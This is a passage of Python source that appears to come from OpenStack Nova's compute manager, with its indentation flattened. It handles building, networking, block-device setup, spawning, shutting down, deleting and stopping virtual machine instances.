LOG.warning(_LW("Instance build timed out. Set to error "
"state."), instance=instance)
def _check_instance_exists(self, context, instance):
"""Ensure an instance with the same name is not already present."""
if self.driver.instance_exists(instance):
raise exception.InstanceExists(name=instance.name)
def _start_building(self, context, instance):
"""Save the host and launched_on fields and log appropriately."""
LOG.info(_LI('Starting instance...'), context=context,
instance=instance)
self._instance_update(context, instance.uuid,
vm_state=vm_states.BUILDING,
task_state=None,
expected_task_state=(task_states.SCHEDULING,
None))
def _allocate_network_async(self, context, instance, requested_networks,
macs, security_groups, is_vpn, dhcp_options):
"""Method used to allocate networks in the background.
Broken out for testing.
"""
LOG.debug("Allocating IP information in the background.",
instance=instance)
retries = CONF.network_allocate_retries
if retries < 0:
LOG.warning(_LW("Treating negative config value (%(retries)s) for "
"'network_allocate_retries' as 0."),
{'retries': retries})
retries = 0
attempts = retries + 1
retry_time = 1
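# Retry the allocation with exponential backoff (1s, 2s, 4s, ...),
# capped at 30 seconds between attempts.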
for attempt in range(1, attempts + 1):
try:
nwinfo = self.network_api.allocate_for_instance(
context, instance, vpn=is_vpn,
requested_networks=requested_networks,
macs=macs,
security_groups=security_groups,
dhcp_options=dhcp_options)
LOG.debug('Instance network_info: |%s|', nwinfo,
instance=instance)
instance.system_metadata['network_allocated'] = 'True'
# NOTE(JoshNang) do not save the instance here, as it can cause
# races. The caller shares a reference to instance and waits
# for this async greenthread to finish before calling
# instance.save().
return nwinfo
except Exception:
exc_info = sys.exc_info()
log_info = {'attempt': attempt,
'attempts': attempts}
if attempt == attempts:
LOG.exception(_LE('Instance failed network setup '
'after %(attempts)d attempt(s)'),
log_info)
raise exc_info[0], exc_info[1], exc_info[2]
LOG.warning(_LW('Instance failed network setup '
'(attempt %(attempt)d of %(attempts)d)'),
log_info, instance=instance)
time.sleep(retry_time)
retry_time *= 2
if retry_time > 30:
retry_time = 30
# Not reached.
def _build_networks_for_instance(self, context, instance,
requested_networks, security_groups):
# If we're here from a reschedule the network may already be allocated.
if strutils.bool_from_string(
instance.system_metadata.get('network_allocated', 'False')):
# NOTE(alex_xu): network_allocated being True means the network
# resources were already allocated during a previous scheduling
# pass and the network setup on that host was cleaned up. After
# rescheduling, the network resources need to be set up on the
# new host.
self.network_api.setup_instance_network_on_host(
context, instance, instance.host)
return self._get_instance_nw_info(context, instance)
if not self.is_neutron_security_groups:
security_groups = []
macs = self.driver.macs_for_instance(instance)
dhcp_options = self.driver.dhcp_options_for_instance(instance)
network_info = self._allocate_network(context, instance,
requested_networks, macs, security_groups, dhcp_options)
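# network_info is a NetworkInfoAsyncWrapper (see _allocate_network
# below); its contents only become available once the async
# allocation has finished.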
if not instance.access_ip_v4 and not instance.access_ip_v6:
# If CONF.default_access_ip_network_name is set, grab the
# corresponding network and set the access ip values accordingly.
# Note that when there are multiple ips to choose from, an
# arbitrary one will be chosen.
network_name = CONF.default_access_ip_network_name
if not network_name:
return network_info
for vif in network_info:
if vif['network']['label'] == network_name:
for ip in vif.fixed_ips():
if ip['version'] == 4:
instance.access_ip_v4 = ip['address']
if ip['version'] == 6:
instance.access_ip_v6 = ip['address']
instance.save()
break
return network_info
def _allocate_network(self, context, instance, requested_networks, macs,
security_groups, dhcp_options):
"""Start network allocation asynchronously. Return an instance
of NetworkInfoAsyncWrapper that can be used to retrieve the
allocated networks when the operation has finished.
"""
# NOTE(comstud): Since we're allocating networks asynchronously,
# this task state has little meaning, as we won't be in this
# state for very long.
instance.vm_state = vm_states.BUILDING
instance.task_state = task_states.NETWORKING
instance.save(expected_task_state=[None])
self._update_resource_tracker(context, instance)
is_vpn = pipelib.is_vpn_image(instance.image_ref)
return network_model.NetworkInfoAsyncWrapper(
self._allocate_network_async, context, instance,
requested_networks, macs, security_groups, is_vpn,
dhcp_options)
def _default_root_device_name(self, instance, image_meta, root_bdm):
try:
return self.driver.default_root_device_name(instance,
image_meta,
root_bdm)
except NotImplementedError:
return compute_utils.get_next_device_name(instance, [])
def _default_device_names_for_instance(self, instance,
root_device_name,
*block_device_lists):
try:
self.driver.default_device_names_for_instance(instance,
root_device_name,
*block_device_lists)
except NotImplementedError:
compute_utils.default_device_names_for_instance(
instance, root_device_name, *block_device_lists)
def _default_block_device_names(self, context, instance,
image_meta, block_devices):
"""Verify that all the devices have the device_name set. If not,
provide a default name.
It also ensures that there is a root_device_name and that it is set to the
first block device in the boot sequence (boot_index=0).
"""
root_bdm = block_device.get_root_bdm(block_devices)
if not root_bdm:
return
# Get the root_device_name from the root BDM or the instance
root_device_name = None
update_root_bdm = False
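# Three cases follow: the root BDM already carries a device name,
# the instance does (copy it onto the BDM), or neither does and a
# default is asked of the driver.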
if root_bdm.device_name:
root_device_name = root_bdm.device_name
instance.root_device_name = root_device_name
elif instance.root_device_name:
root_device_name = instance.root_device_name
root_bdm.device_name = root_device_name
update_root_bdm = True
else:
root_device_name = self._default_root_device_name(instance,
image_meta,
root_bdm)
instance.root_device_name = root_device_name
root_bdm.device_name = root_device_name
update_root_bdm = True
if update_root_bdm:
root_bdm.save()
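# With the root device named, let the driver (or the generic
# helper) assign default names to the remaining ephemeral, swap
# and volume mappings.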
ephemerals = filter(block_device.new_format_is_ephemeral,
block_devices)
swap = filter(block_device.new_format_is_swap,
block_devices)
block_device_mapping = filter(
driver_block_device.is_block_device_mapping, block_devices)
self._default_device_names_for_instance(instance,
root_device_name,
ephemerals,
swap,
block_device_mapping)
def _prep_block_device(self, context, instance, bdms,
do_check_attach=True):
"""Set up the block device for an instance with error logging."""
try:
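# Convert the BDMs into the driver block_device_info format,
# attaching volume-, snapshot-, image- and blank-backed devices
# along the way.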
block_device_info = {
'root_device_name': instance.root_device_name,
'swap': driver_block_device.convert_swap(bdms),
'ephemerals': driver_block_device.convert_ephemerals(bdms),
'block_device_mapping': (
driver_block_device.attach_block_devices(
driver_block_device.convert_volumes(bdms),
context, instance, self.volume_api,
self.driver, do_check_attach=do_check_attach) +
driver_block_device.attach_block_devices(
driver_block_device.convert_snapshots(bdms),
context, instance, self.volume_api,
self.driver, self._await_block_device_map_created,
do_check_attach=do_check_attach) +
driver_block_device.attach_block_devices(
driver_block_device.convert_images(bdms),
context, instance, self.volume_api,
self.driver, self._await_block_device_map_created,
do_check_attach=do_check_attach) +
driver_block_device.attach_block_devices(
driver_block_device.convert_blanks(bdms),
context, instance, self.volume_api,
self.driver, self._await_block_device_map_created,
do_check_attach=do_check_attach))
}
if self.use_legacy_block_device_info:
for bdm_type in ('swap', 'ephemerals', 'block_device_mapping'):
block_device_info[bdm_type] = \
driver_block_device.legacy_block_devices(
block_device_info[bdm_type])
# Get swap out of the list
block_device_info['swap'] = driver_block_device.get_swap(
block_device_info['swap'])
return block_device_info
except exception.OverQuota:
msg = _LW('Failed to create block device for instance due to '
'being over volume resource quota')
LOG.warning(msg, instance=instance)
raise exception.InvalidBDM()
except Exception:
LOG.exception(_LE('Instance failed block device setup'),
instance=instance)
raise exception.InvalidBDM()
def _update_instance_after_spawn(self, context, instance):
instance.power_state = self._get_power_state(context, instance)
instance.vm_state = vm_states.ACTIVE
instance.task_state = None
instance.launched_at = timeutils.utcnow()
configdrive.update_instance(instance)
@object_compat
def _spawn(self, context, instance, image_meta, network_info,
block_device_info, injected_files, admin_password,
set_access_ip=False):
"""Spawn an instance with error logging and update its power state."""
instance.vm_state = vm_states.BUILDING
instance.task_state = task_states.SPAWNING
instance.save(expected_task_state=task_states.BLOCK_DEVICE_MAPPING)
try:
self.driver.spawn(context, instance, image_meta,
injected_files, admin_password,
network_info,
block_device_info)
except Exception:
with excutils.save_and_reraise_exception():
LOG.exception(_LE('Instance failed to spawn'),
instance=instance)
self._update_instance_after_spawn(context, instance)
def _set_access_ip_values():
"""Add access ip values for a given instance.
If CONF.default_access_ip_network_name is set, this method will
grab the corresponding network and set the access ip values
accordingly. Note that when there are multiple ips to choose
from, an arbitrary one will be chosen.
"""
network_name = CONF.default_access_ip_network_name
if not network_name:
return
for vif in network_info:
if vif['network']['label'] == network_name:
for ip in vif.fixed_ips():
if ip['version'] == 4:
instance.access_ip_v4 = ip['address']
if ip['version'] == 6:
instance.access_ip_v6 = ip['address']
return
if set_access_ip:
_set_access_ip_values()
network_info.wait(do_raise=True)
instance.info_cache.network_info = network_info
# NOTE(JoshNang) This also saves the changes to the instance from
# _allocate_network_async, as they aren't saved in that function
# to prevent races.
instance.save(expected_task_state=task_states.SPAWNING)
return instance
def _update_scheduler_instance_info(self, context, instance):
"""Sends an InstanceList with created or updated Instance objects to
the Scheduler client.
In the case of init_host, the value passed will already be an
InstanceList. Other calls will send individual Instance objects that
have been created or resized. In this case, we create an InstanceList
object containing that Instance.
"""
if not self.send_instance_updates:
return
if isinstance(instance, objects.Instance):
instance = objects.InstanceList(objects=[instance])
context = context.elevated()
self.scheduler_client.update_instance_info(context, self.host,
instance)
def _delete_scheduler_instance_info(self, context, instance_uuid):
"""Sends the uuid of the deleted Instance to the Scheduler client."""
if not self.send_instance_updates:
return
context = context.elevated()
self.scheduler_client.delete_instance_info(context, self.host,
instance_uuid)
@periodic_task.periodic_task(spacing=CONF.scheduler_instance_sync_interval)
def _sync_scheduler_instance_info(self, context):
if not self.send_instance_updates:
return
context = context.elevated()
instances = objects.InstanceList.get_by_host(context, self.host,
expected_attrs=[],
use_slave=True)
uuids = [instance.uuid for instance in instances]
self.scheduler_client.sync_instance_info(context, self.host, uuids)
def _notify_about_instance_usage(self, context, instance, event_suffix,
network_info=None, system_metadata=None,
extra_usage_info=None, fault=None):
compute_utils.notify_about_instance_usage(
self.notifier, context, instance, event_suffix,
network_info=network_info,
system_metadata=system_metadata,
extra_usage_info=extra_usage_info, fault=fault)
def _deallocate_network(self, context, instance,
requested_networks=None):
LOG.debug('Deallocating network for instance', instance=instance)
self.network_api.deallocate_for_instance(
context, instance, requested_networks=requested_networks)
def _get_instance_block_device_info(self, context, instance,
refresh_conn_info=False,
bdms=None):
"""Transform block devices to the driver block_device format."""
if not bdms:
bdms = objects.BlockDeviceMappingList.get_by_instance_uuid(
context, instance.uuid)
swap = driver_block_device.convert_swap(bdms)
ephemerals = driver_block_device.convert_ephemerals(bdms)
block_device_mapping = (
driver_block_device.convert_volumes(bdms) +
driver_block_device.convert_snapshots(bdms) +
driver_block_device.convert_images(bdms))
if not refresh_conn_info:
# if the block_device_mapping has no value in connection_info
# (returned as None), don't include it in the mapping
block_device_mapping = [
bdm for bdm in block_device_mapping
if bdm.get('connection_info')]
else:
block_device_mapping = driver_block_device.refresh_conn_infos(
block_device_mapping, context, instance, self.volume_api,
self.driver)
if self.use_legacy_block_device_info:
swap = driver_block_device.legacy_block_devices(swap)
ephemerals = driver_block_device.legacy_block_devices(ephemerals)
block_device_mapping = driver_block_device.legacy_block_devices(
block_device_mapping)
# Get swap out of the list
swap = driver_block_device.get_swap(swap)
root_device_name = instance.get('root_device_name')
return {'swap': swap,
'root_device_name': root_device_name,
'ephemerals': ephemerals,
'block_device_mapping': block_device_mapping}
# NOTE(mikal): No object_compat wrapper on this method because its
# callers all pass objects already
@wrap_exception()
@reverts_task_state
@wrap_instance_fault
def build_and_run_instance(self, context, instance, image, request_spec,
filter_properties, admin_password=None,
injected_files=None, requested_networks=None,
security_groups=None, block_device_mapping=None,
node=None, limits=None):
# NOTE(danms): Remove this in v4.0 of the RPC API
if (requested_networks and
not isinstance(requested_networks,
objects.NetworkRequestList)):
requested_networks = objects.NetworkRequestList(
objects=[objects.NetworkRequest.from_tuple(t)
for t in requested_networks])
# NOTE(melwitt): Remove this in v4.0 of the RPC API
flavor = filter_properties.get('instance_type')
if flavor and not isinstance(flavor, objects.Flavor):
# Code downstream may expect extra_specs to be populated since it
# is receiving an object, so look up the flavor to ensure this.
flavor = objects.Flavor.get_by_id(context, flavor['id'])
filter_properties = dict(filter_properties, instance_type=flavor)
# NOTE(sahid): Remove this in v4.0 of the RPC API
if (limits and 'numa_topology' in limits and
isinstance(limits['numa_topology'], six.string_types)):
db_obj = jsonutils.loads(limits['numa_topology'])
limits['numa_topology'] = (
objects.NUMATopologyLimits.obj_from_db_obj(db_obj))
@utils.synchronized(instance.uuid)
def _locked_do_build_and_run_instance(*args, **kwargs):
# NOTE(danms): We grab the semaphore with the instance uuid
# locked because we could wait in line to build this instance
# for a while and we want to make sure that nothing else tries
# to do anything with this instance while we wait.
with self._build_semaphore:
self._do_build_and_run_instance(*args, **kwargs)
# NOTE(danms): We spawn here to return the RPC worker thread back to
# the pool. Since what follows could take a really long time, we don't
# want to tie up RPC workers.
utils.spawn_n(_locked_do_build_and_run_instance,
context, instance, image, request_spec,
filter_properties, admin_password, injected_files,
requested_networks, security_groups,
block_device_mapping, node, limits)
@hooks.add_hook('build_instance')
@wrap_exception()
@reverts_task_state
@wrap_instance_event
@wrap_instance_fault
def _do_build_and_run_instance(self, context, instance, image,
request_spec, filter_properties, admin_password, injected_files,
requested_networks, security_groups, block_device_mapping,
node=None, limits=None):
try:
LOG.info(_LI('Starting instance...'), context=context,
instance=instance)
instance.vm_state = vm_states.BUILDING
instance.task_state = None
instance.save(expected_task_state=
(task_states.SCHEDULING, None))
except exception.InstanceNotFound:
msg = 'Instance disappeared before build.'
LOG.debug(msg, instance=instance)
return build_results.FAILED
except exception.UnexpectedTaskStateError as e:
LOG.debug(e.format_message(), instance=instance)
return build_results.FAILED
# b64 decode the files to inject:
decoded_files = self._decode_files(injected_files)
if limits is None:
limits = {}
if node is None:
node = self.driver.get_available_nodes(refresh=True)[0]
LOG.debug('No node specified, defaulting to %s', node,
instance=instance)
try:
self._build_and_run_instance(context, instance, image,
decoded_files, admin_password, requested_networks,
security_groups, block_device_mapping, node, limits,
filter_properties)
return build_results.ACTIVE
except exception.RescheduledException as e:
retry = filter_properties.get('retry', None)
if not retry:
# no retry information, do not reschedule.
LOG.debug("Retry info not present, will not reschedule",
instance=instance)
self._cleanup_allocated_networks(context, instance,
requested_networks)
compute_utils.add_instance_fault_from_exc(context,
instance, e, sys.exc_info())
self._set_instance_error_state(context, instance)
return build_results.FAILED
LOG.debug(e.format_message(), instance=instance)
retry['exc'] = traceback.format_exception(*sys.exc_info())
# NOTE(comstud): Deallocate networks if the driver wants
# us to do so.
if self.driver.deallocate_networks_on_reschedule(instance):
self._cleanup_allocated_networks(context, instance,
requested_networks)
else:
# NOTE(alex_xu): The network is already allocated and we
# don't want to deallocate it before rescheduling. But we do
# need to clean up the network resources that were set up on
# this host before rescheduling.
self.network_api.cleanup_instance_network_on_host(
context, instance, self.host)
instance.task_state = task_states.SCHEDULING
instance.save()
self.compute_task_api.build_instances(context, [instance],
image, filter_properties, admin_password,
injected_files, requested_networks, security_groups,
block_device_mapping)
return build_results.RESCHEDULED
except (exception.InstanceNotFound,
exception.UnexpectedDeletingTaskStateError):
msg = 'Instance disappeared during build.'
LOG.debug(msg, instance=instance)
self._cleanup_allocated_networks(context, instance,
requested_networks)
return build_results.FAILED
except exception.BuildAbortException as e:
LOG.exception(e.format_message(), instance=instance)
self._cleanup_allocated_networks(context, instance,
requested_networks)
self._cleanup_volumes(context, instance.uuid,
block_device_mapping, raise_exc=False)
compute_utils.add_instance_fault_from_exc(context, instance,
e, sys.exc_info())
self._set_instance_error_state(context, instance)
return build_results.FAILED
except Exception as e:
# Should not reach here.
msg = _LE('Unexpected build failure, not rescheduling build.')
LOG.exception(msg, instance=instance)
self._cleanup_allocated_networks(context, instance,
requested_networks)
self._cleanup_volumes(context, instance.uuid,
block_device_mapping, raise_exc=False)
compute_utils.add_instance_fault_from_exc(context, instance,
e, sys.exc_info())
self._set_instance_error_state(context, instance)
return build_results.FAILED
def _build_and_run_instance(self, context, instance, image, injected_files,
admin_password, requested_networks, security_groups,
block_device_mapping, node, limits, filter_properties):
image_name = image.get('name')
self._notify_about_instance_usage(context, instance, 'create.start',
extra_usage_info={'image_name': image_name})
try:
rt = self._get_resource_tracker(node)
with rt.instance_claim(context, instance, limits):
# NOTE(russellb) It's important that this validation be done
# *after* the resource tracker instance claim, as that is where
# the host is set on the instance.
self._validate_instance_group_policy(context, instance,
filter_properties)
with self._build_resources(context, instance,
requested_networks, security_groups, image,
block_device_mapping) as resources:
instance.vm_state = vm_states.BUILDING
instance.task_state = task_states.SPAWNING
# NOTE(JoshNang) This also saves the changes to the
# instance from _allocate_network_async, as they aren't
# saved in that function to prevent races.
instance.save(expected_task_state=
task_states.BLOCK_DEVICE_MAPPING)
block_device_info = resources['block_device_info']
network_info = resources['network_info']
self.driver.spawn(context, instance, image,
injected_files, admin_password,
network_info=network_info,
block_device_info=block_device_info)
except (exception.InstanceNotFound,
exception.UnexpectedDeletingTaskStateError) as e:
with excutils.save_and_reraise_exception():
self._notify_about_instance_usage(context, instance,
'create.end', fault=e)
except exception.ComputeResourcesUnavailable as e:
LOG.debug(e.format_message(), instance=instance)
self._notify_about_instance_usage(context, instance,
'create.error', fault=e)
raise exception.RescheduledException(
instance_uuid=instance.uuid, reason=e.format_message())
except exception.BuildAbortException as e:
with excutils.save_and_reraise_exception():
LOG.debug(e.format_message(), instance=instance)
self._notify_about_instance_usage(context, instance,
'create.error', fault=e)
except (exception.FixedIpLimitExceeded,
exception.NoMoreNetworks, exception.NoMoreFixedIps) as e:
LOG.warning(_LW('No more network or fixed IP to be allocated'),
instance=instance)
self._notify_about_instance_usage(context, instance,
'create.error', fault=e)
msg = _('Failed to allocate the network(s) with error %s, '
'not rescheduling.') % e.format_message()
raise exception.BuildAbortException(instance_uuid=instance.uuid,
reason=msg)
except (exception.VirtualInterfaceCreateException,
exception.VirtualInterfaceMacAddressException) as e:
LOG.exception(_LE('Failed to allocate network(s)'),
instance=instance)
self._notify_about_instance_usage(context, instance,
'create.error', fault=e)
msg = _('Failed to allocate the network(s), not rescheduling.')
raise exception.BuildAbortException(instance_uuid=instance.uuid,
reason=msg)
except (exception.FlavorDiskTooSmall,
exception.FlavorMemoryTooSmall,
exception.ImageNotActive,
exception.ImageUnacceptable) as e:
self._notify_about_instance_usage(context, instance,
'create.error', fault=e)
raise exception.BuildAbortException(instance_uuid=instance.uuid,
reason=e.format_message())
except Exception as e:
self._notify_about_instance_usage(context, instance,
'create.error', fault=e)
raise exception.RescheduledException(
instance_uuid=instance.uuid, reason=six.text_type(e))
# NOTE(alaski): This is only useful during reschedules, remove it now.
instance.system_metadata.pop('network_allocated', None)
self._update_instance_after_spawn(context, instance)
try:
instance.save(expected_task_state=task_states.SPAWNING)
except (exception.InstanceNotFound,
exception.UnexpectedDeletingTaskStateError) as e:
with excutils.save_and_reraise_exception():
self._notify_about_instance_usage(context, instance,
'create.end', fault=e)
self._update_scheduler_instance_info(context, instance)
self._notify_about_instance_usage(context, instance, 'create.end',
extra_usage_info={'message': _('Success')},
network_info=network_info)
@contextlib.contextmanager
def _build_resources(self, context, instance, requested_networks,
security_groups, image, block_device_mapping):
resources = {}
network_info = None
try:
network_info = self._build_networks_for_instance(context, instance,
requested_networks, security_groups)
resources['network_info'] = network_info
except (exception.InstanceNotFound,
exception.UnexpectedDeletingTaskStateError):
raise
except exception.UnexpectedTaskStateError as e:
raise exception.BuildAbortException(instance_uuid=instance.uuid,
reason=e.format_message())
except Exception:
# Because this allocation is async, any failures are likely to occur
# when the driver accesses network_info during spawn().
LOG.exception(_LE('Failed to allocate network(s)'),
instance=instance)
msg = _('Failed to allocate the network(s), not rescheduling.')
raise exception.BuildAbortException(instance_uuid=instance.uuid,
reason=msg)
try:
# Verify that all the BDMs have a device_name set and assign a
# default to the ones missing it with the help of the driver.
self._default_block_device_names(context, instance, image,
block_device_mapping)
instance.vm_state = vm_states.BUILDING
instance.task_state = task_states.BLOCK_DEVICE_MAPPING
instance.save()
block_device_info = self._prep_block_device(context, instance,
block_device_mapping)
resources['block_device_info'] = block_device_info
except (exception.InstanceNotFound,
exception.UnexpectedDeletingTaskStateError):
with excutils.save_and_reraise_exception() as ctxt:
# Make sure the async call finishes
if network_info is not None:
network_info.wait(do_raise=False)
except exception.UnexpectedTaskStateError as e:
# Make sure the async call finishes
if network_info is not None:
network_info.wait(do_raise=False)
raise exception.BuildAbortException(instance_uuid=instance.uuid,
reason=e.format_message())
except Exception:
LOG.exception(_LE('Failure prepping block device'),
instance=instance)
# Make sure the async call finishes
if network_info is not None:
network_info.wait(do_raise=False)
msg = _('Failure prepping block device.')
raise exception.BuildAbortException(instance_uuid=instance.uuid,
reason=msg)
try:
yield resources
except Exception as exc:
with excutils.save_and_reraise_exception() as ctxt:
if not isinstance(exc, (exception.InstanceNotFound,
exception.UnexpectedDeletingTaskStateError)):
LOG.exception(_LE('Instance failed to spawn'),
instance=instance)
# Make sure the async call finishes
if network_info is not None:
network_info.wait(do_raise=False)
# If network_info is empty we're likely here because of a
# network allocation failure. Since nothing can be reused on
# rescheduling, it's better to deallocate the network to
# eliminate the chance of orphaned ports in neutron.
deallocate_networks = not network_info
try:
self._shutdown_instance(context, instance,
block_device_mapping, requested_networks,
try_deallocate_networks=deallocate_networks)
except Exception:
ctxt.reraise = False
msg = _('Could not clean up failed build,'
' not rescheduling')
raise exception.BuildAbortException(
instance_uuid=instance.uuid, reason=msg)
def _cleanup_allocated_networks(self, context, instance,
requested_networks):
try:
self._deallocate_network(context, instance, requested_networks)
except Exception:
msg = _LE('Failed to deallocate networks')
LOG.exception(msg, instance=instance)
return
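# Record that the networks are gone so a later reschedule knows it
# has to allocate them again (see _build_networks_for_instance).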
instance.system_metadata['network_allocated'] = 'False'
try:
instance.save()
except exception.InstanceNotFound:
# NOTE(alaski): It's possible that we're cleaning up the networks
# because the instance was deleted. If that's the case then this
# exception will be raised by instance.save()
pass
@object_compat
@messaging.expected_exceptions(exception.BuildAbortException,
exception.UnexpectedTaskStateError,
exception.VirtualInterfaceCreateException,
exception.RescheduledException)
@wrap_exception()
@reverts_task_state
@wrap_instance_event
@wrap_instance_fault
def run_instance(self, context, instance, request_spec,
filter_properties, requested_networks,
injected_files, admin_password,
is_first_time, node, legacy_bdm_in_spec):
# NOTE(alaski) This method should be deprecated when the scheduler and
# compute rpc interfaces are bumped to 4.x, and slated for removal in
# 5.x as it is no longer used.
if filter_properties is None:
filter_properties = {}
@utils.synchronized(instance.uuid)
def do_run_instance():
self._run_instance(context, request_spec,
filter_properties, requested_networks, injected_files,
admin_password, is_first_time, node, instance,
legacy_bdm_in_spec)
do_run_instance()
def _try_deallocate_network(self, context, instance,
requested_networks=None):
try:
# tear down allocated network structure
self._deallocate_network(context, instance, requested_networks)
except Exception:
with excutils.save_and_reraise_exception():
LOG.error(_LE('Failed to deallocate network for instance.'),
instance=instance)
self._set_instance_error_state(context, instance)
def _get_power_off_values(self, context, instance, clean_shutdown):
"""Get the timing configuration for powering down this instance."""
if clean_shutdown:
timeout = compute_utils.get_value_from_system_metadata(instance,
key='image_os_shutdown_timeout', type=int,
default=CONF.shutdown_timeout)
retry_interval = self.SHUTDOWN_RETRY_INTERVAL
else:
timeout = 0
retry_interval = 0
return timeout, retry_interval
def _power_off_instance(self, context, instance, clean_shutdown=True):
"""Power off an instance on this host."""
timeout, retry_interval = self._get_power_off_values(context,
instance, clean_shutdown)
self.driver.power_off(instance, timeout, retry_interval)
def _shutdown_instance(self, context, instance,
bdms, requested_networks=None, notify=True,
try_deallocate_networks=True):
"""Shutdown an instance on this host.
:param context: security context
:param instance: a nova.objects.Instance object
:param bdms: the block devices for the instance to be torn
down
:param requested_networks: the networks on which the instance
has ports
:param notify: true if a final usage notification should be
emitted
:param try_deallocate_networks: false if we should avoid
trying to tear down networking
"""
context = context.elevated()
LOG.info(_LI('Terminating instance'),
context=context, instance=instance)
if notify:
self._notify_about_instance_usage(context, instance,
"shutdown.start")
network_info = compute_utils.get_nw_info_for_instance(instance)
# NOTE(vish) get bdms before destroying the instance
vol_bdms = [bdm for bdm in bdms if bdm.is_volume]
block_device_info = self._get_instance_block_device_info(
context, instance, bdms=bdms)
# NOTE(melwitt): attempt driver destroy before releasing ip, may
# want to keep ip allocated for certain failures
try:
self.driver.destroy(context, instance, network_info,
block_device_info)
except exception.InstancePowerOffFailure:
# if the instance can't power off, don't release the ip
with excutils.save_and_reraise_exception():
pass
except Exception:
with excutils.save_and_reraise_exception():
# deallocate ip and fail without proceeding to
# volume api calls, preserving current behavior
if try_deallocate_networks:
self._try_deallocate_network(context, instance,
requested_networks)
if try_deallocate_networks:
self._try_deallocate_network(context, instance, requested_networks)
for bdm in vol_bdms:
try:
# NOTE(vish): actual driver detach done in driver.destroy, so
# just tell cinder that we are done with it.
connector = self.driver.get_volume_connector(instance)
self.volume_api.terminate_connection(context,
bdm.volume_id,
connector)
self.volume_api.detach(context, bdm.volume_id)
except exception.DiskNotFound as exc:
LOG.debug('Ignoring DiskNotFound: %s', exc,
instance=instance)
except exception.VolumeNotFound as exc:
LOG.debug('Ignoring VolumeNotFound: %s', exc,
instance=instance)
except (cinder_exception.EndpointNotFound,
keystone_exception.EndpointNotFound) as exc:
LOG.warning(_LW('Ignoring EndpointNotFound: %s'), exc,
instance=instance)
if notify:
self._notify_about_instance_usage(context, instance,
"shutdown.end")
def _cleanup_volumes(self, context, instance_uuid, bdms, raise_exc=True):
exc_info = None
for bdm in bdms:
LOG.debug("terminating bdm %s", bdm,
instance_uuid=instance_uuid)
if bdm.volume_id and bdm.delete_on_termination:
try:
self.volume_api.delete(context, bdm.volume_id)
except Exception as exc:
exc_info = sys.exc_info()
LOG.warning(_LW('Failed to delete volume: %(volume_id)s '
'due to %(exc)s'),
{'volume_id': bdm.volume_id, 'exc': exc})
if exc_info is not None and raise_exc:
six.reraise(exc_info[0], exc_info[1], exc_info[2])
@hooks.add_hook("delete_instance")
def _delete_instance(self, context, instance, bdms, quotas):
"""Delete an instance on this host. Commit or rollback quotas
as necessary.
:param context: nova request context
:param instance: nova.objects.instance.Instance object
:param bdms: nova.objects.block_device.BlockDeviceMappingList object
:param quotas: nova.objects.quotas.Quotas object
"""
was_soft_deleted = instance.vm_state == vm_states.SOFT_DELETED
if was_soft_deleted:
# Instances in SOFT_DELETED vm_state have already had quotas
# decremented.
try:
quotas.rollback()
except Exception:
pass
try:
events = self.instance_events.clear_events_for_instance(instance)
if events:
LOG.debug('Events pending at deletion: %(events)s',
{'events': ','.join(events.keys())},
instance=instance)
self._notify_about_instance_usage(context, instance,
"delete.start")
self._shutdown_instance(context, instance, bdms)
# NOTE(dims): instance.info_cache.delete() should be called after
# _shutdown_instance in the compute manager as shutdown calls
# deallocate_for_instance so the info_cache is still needed
# at this point.
instance.info_cache.delete()
# NOTE(vish): We have already deleted the instance, so we have
# to ignore problems cleaning up the volumes. It
# would be nice to let the user know somehow that
# the volume deletion failed, but it is not
# acceptable to have an instance that can not be
# deleted. Perhaps this could be reworked in the
# future to set an instance fault the first time
# and to only ignore the failure if the instance
# is already in ERROR.
self._cleanup_volumes(context, instance.uuid, bdms,
raise_exc=False)
# if a delete task succeeded, always update vm state and task
# state without expecting task state to be DELETING
instance.vm_state = vm_states.DELETED
instance.task_state = None
instance.power_state = power_state.NOSTATE
instance.terminated_at = timeutils.utcnow()
instance.save()
self._update_resource_tracker(context, instance)
system_meta = instance.system_metadata
instance.destroy()
except Exception:
with excutils.save_and_reraise_exception():
quotas.rollback()
self._complete_deletion(context,
instance,
bdms,
quotas,
system_meta)
@wrap_exception()
@reverts_task_state
@wrap_instance_event
@wrap_instance_fault
def terminate_instance(self, context, instance, bdms, reservations):
"""Terminate an instance on this host."""
# NOTE (ndipanov): If we get non-object BDMs, just get them from the
# db again, as this means they are sent in the old format and we want
# to avoid converting them back when we can just get them.
# Remove this when we bump the RPC major version to 4.0
if (bdms and
any(not isinstance(bdm, obj_base.NovaObject)
for bdm in bdms)):
bdms = objects.BlockDeviceMappingList.get_by_instance_uuid(
context, instance.uuid)
quotas = objects.Quotas.from_reservations(context,
reservations,
instance=instance)
@utils.synchronized(instance.uuid)
def do_terminate_instance(instance, bdms):
try:
self._delete_instance(context, instance, bdms, quotas)
except exception.InstanceNotFound:
LOG.info(_LI("Instance disappeared during terminate"),
instance=instance)
except Exception:
# As we're trying to delete, always go to ERROR if something
# goes wrong that _delete_instance can't handle.
with excutils.save_and_reraise_exception():
LOG.exception(_LE('Setting instance vm_state to ERROR'),
instance=instance)
self._set_instance_error_state(context, instance)
do_terminate_instance(instance, bdms)
# NOTE(johannes): This is probably better named power_off_instance
# so it matches the driver method, but because of other issues, we
# can't use that name in grizzly.
@wrap_exception()
@reverts_task_state
@wrap_instance_event
@wrap_instance_fault
def stop_instance(self, context, instance, clean_shutdown=True):
"""Stopping an instance on this host."""
@utils.synchronized(instance.uuid)
def do_stop_instance():
current_power_state = self._get_power_state(context, instance)
LOG.debug('Stopping instance; current vm_state: %(vm_state)s, '
'current task_state: %(task_state)s, current DB '
'power_state: %(db_power_state)s, current VM '
'power_state: %(current_power_state)s',
dict(vm_state=instance.vm_state,
task_state=instance.task_state,
db_power_state=instance.power_state,
current_power_state=current_power_state),
instance_uuid=instance.uuid)
# NOTE(mriedem): If the instance is already powered off, we are
# possibly tearing down and racing with other operations, so we can
# expect the task_state to be None if something else updates the
# instance and we're not locking it.
expected_task_state = [task_states.POWERING_OFF]
# The list of power states is from _sync_instance_power_state.
if current_power_state in (power_state.NOSTATE,
power_state.SHUTDOWN,
power_state.CRASHED):
LOG.info(_LI('Instance is already powered off in the '
'hypervisor when stop is called.'),
instance=instance)
expected_task_state.append(None)
self._notify_about_instance_usage(context, instance,
"power_off.start")
self._power_off_instance(context, instance, clean_shutdown)
instance.power_state = self._get_power_state(context, instance)
instance.vm_state = vm_states.STOPPED
instance.task_state = None
instance.save(expected_task_state=expected_task_state)
self._notify_about_instance_usage(context, instance,
"power_off.end")
do_stop_instance()
def _power_on(self, context, instance):
network_info = self._get_instance_nw_info(context, instance)
